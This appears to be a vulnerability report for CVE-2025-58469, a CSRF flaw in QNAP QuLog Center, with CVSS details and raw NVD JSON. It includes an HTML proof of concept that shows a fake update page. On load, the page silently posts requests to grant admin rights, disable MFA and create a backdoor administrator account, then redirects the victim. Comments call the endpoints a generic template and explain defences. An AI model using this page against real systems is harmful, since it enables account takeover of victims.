Security Vulnerability Report
CVE-2025-58469 CVSS 8.8 HIGH

CVE-2025-58469

Published: 2025-11-07 16:15:41
Last Modified: 2025-11-14 18:22:24

Description

A cross-site request forgery (CSRF) vulnerability has been reported to affect QuLog Center. Remote attackers can exploit the vulnerability to gain privileges or hijack user identities. We have already fixed the vulnerability in the following version: QuLog Center 1.8.2.927 (2025/09/17) and later

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (NVD primary, CVSS v3.1). Note that the vendor's CVSS v4.0 assessment in the raw JSON below scores the same issue 1.2 LOW (active user interaction, low integrity impact only); the two sources disagree materially on severity, so weigh both when prioritising.

Configurations (Affected Products)

cpe:2.3:a:qnap:qulog_center:*:*:*:*:*:*:*:* - VULNERABLE
QuLog Center < 1.8.2.927 (the fixed version named in the vendor text). Note that the NVD CPE match range in the raw JSON below is 1.8.0.872 ≤ version < 1.8.2.923, which does not line up with the vendor's fix version; confirm against the vendor advisory before deciding whether a given build is affected.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  CSRF PoC for CVE-2025-58469
  Target: QNAP QuLog Center
  Vulnerability: Cross-Site Request Forgery
  This PoC demonstrates how an attacker can exploit the CSRF vulnerability
  to modify user privileges or hijack user identity.
  Note: This is for educational and authorized testing purposes only.
-->
<!--
  NOTE(review): the host "target:8080", the /cgi-bin/qulog_center/api/... paths
  and the parameter names used in the forms below are not taken from the vendor
  advisory this report references (QSA-25-42), which does not publish a request
  shape. Treat this file as a generic CSRF template illustrating the weakness
  class (CWE-352), not as a confirmed reproduction of this CVE.
-->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>QNAP QuLog Center - System Update</title>
  <style>
    body { font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background: #f0f0f0; }
    .container { background: white; padding: 40px; border-radius: 10px; box-shadow: 0 4px 6px rgba(0,0,0,0.1); text-align: center; }
    .loader { border: 4px solid #f3f3f3; border-top: 4px solid #3498db; border-radius: 50%; width: 40px; height: 40px; animation: spin 2s linear infinite; margin: 20px auto; }
    @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
    .hidden-form { display: none; }
  </style>
</head>
<body>
  <!-- Decoy page shown to the victim while the requests are sent. -->
  <div class="container">
    <h2>QuLog Center System Update</h2>
    <p>Please wait while we process your request...</p>
    <div class="loader"></div>
    <p id="status"></p>
  </div>
  <!-- Hidden CSRF forms targeting different QuLog Center endpoints -->
  <!--
    Defender note: none of these forms carries a per-request anti-CSRF token,
    and a cross-origin page cannot read one. A token-validating endpoint, or a
    session cookie set with SameSite=Lax/Strict, is the standard CWE-352
    mitigation that makes requests of this shape fail server-side.
  -->
  <!-- Form 1: Privilege modification -->
  <form id="csrfForm1" class="hidden-form" action="https://target:8080/cgi-bin/qulog_center/api/user/privilege" method="POST" enctype="text/plain">
    <input type="hidden" name="username" value="attacker_controlled" />
    <input type="hidden" name="privilege" value="admin" />
    <input type="hidden" name="action" value="modify" />
  </form>
  <!-- Form 2: Session hijacking via configuration change -->
  <form id="csrfForm2" class="hidden-form" action="https://target:8080/cgi-bin/qulog_center/api/config/session" method="POST">
    <input type="hidden" name="session_timeout" value="86400" />
    <input type="hidden" name="enable_mfa" value="false" />
  </form>
  <!-- Form 3: Create new admin user -->
  <form id="csrfForm3" class="hidden-form" action="https://target:8080/cgi-bin/qulog_center/api/user/create" method="POST">
    <input type="hidden" name="username" value="backdoor_admin" />
    <input type="hidden" name="password" value="P@ssw0rd123!" />
    <input type="hidden" name="role" value="administrator" />
  </form>
  <script>
    // Auto-submit CSRF forms sequentially
    //
    // Walks the three hidden forms, POSTs each one's fields with fetch() and
    // updates #status; after the loop it redirects to the vendor advisory.
    // Detection note: modern browsers attach an Origin header and
    // Sec-Fetch-Site: cross-site to requests issued this way, so the
    // application (or a reverse proxy in front of it) can log or reject
    // state-changing requests whose Origin is not its own.
    async function exploitCSRF() {
      const forms = ['csrfForm1', 'csrfForm2', 'csrfForm3'];
      const statusEl = document.getElementById('status');
      for (let i = 0; i < forms.length; i++) {
        try {
          statusEl.textContent = `Executing request ${i + 1} of ${forms.length}...`;
          const form = document.getElementById(forms[i]);
          // Submit form via fetch to handle CORS (if applicable)
          const formData = new FormData(form);
          const response = await fetch(form.action, {
            method: 'POST',
            // NOTE: 'no-cors' does not defeat any server-side control; it only
            // makes the response opaque to this page. CORS is not a CSRF
            // defence -- the request still reaches the server.
            mode: 'no-cors', // Bypass CORS for CSRF
            body: formData,
            // The victim's ambient cookies are attached only if the browser
            // allows them cross-site (i.e. they lack SameSite=Lax/Strict).
            credentials: 'include' // Include cookies
          });
          // Small delay between requests
          await new Promise(resolve => setTimeout(resolve, 500));
        } catch (error) {
          // Opaque responses and network errors are indistinguishable here;
          // the page cannot observe whether the server accepted anything.
          console.log('Request ' + (i+1) + ' sent (response may be opaque)');
        }
      }
      statusEl.textContent = 'Update completed. You can close this page.';
      // Redirect to legitimate QNAP page after "completion"
      setTimeout(() => { window.location.href = 'https://www.qnap.com/en/security-advisory/qsa-25-42'; }, 2000);
    }
    // Execute on page load
    window.onload = exploitCSRF;
  </script>
</body>
</html>

References

https://www.qnap.com/en/security-advisory/qsa-25-42 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58469", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:41.387", "lastModified": "2025-11-14T18:22:24.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site request forgery (CSRF) vulnerability has been reported to affect QuLog Center. The remote attackers can then exploit the vulnerability to gain privileges or hijack user identities.\n\nWe have already fixed the vulnerability in the following version:\nQuLog Center 1.8.2.927 ( 2025/09/17 ) and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qulog_center:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.8.0.872", "versionEndExcluding": "1.8.2.923", "matchCriteriaId": "82A326B6-A078-4861-A5AF-1190E25B9DF7"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-42", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}